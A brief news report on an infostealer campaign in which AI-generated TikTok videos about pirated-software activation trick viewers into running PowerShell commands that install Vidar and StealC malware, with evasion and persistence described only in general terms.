TikTok Users Hit by AI Malware in Video Scam

Hackers are exploiting TikTok’s popularity to distribute information-stealing malware using AI-generated tutorial videos, according to researchers at Censys. The campaign targets users searching for pirated software by presenting convincing how-to videos that guide viewers through fake activation processes. Instead of legitimate instructions, the videos prompt users to run PowerShell commands that install malware such as Vidar and StealC.

The malicious content, some of which has amassed nearly 500,000 views, highlights a growing trend of AI-enhanced social engineering. The malware is distributed through a network of domains hosted by AS214196, a bulletproof hosting provider that promotes anonymous virtual servers with no KYC requirements.

The PowerShell-based infection uses obfuscation, base64 encoding, and evasion techniques to bypass Windows Defender and maintain persistence. Once installed, the malware hides in system folders and poses as a Windows Update service to avoid detection. The operation’s scale and sophistication mark a significant evolution in social media-driven cyber threats.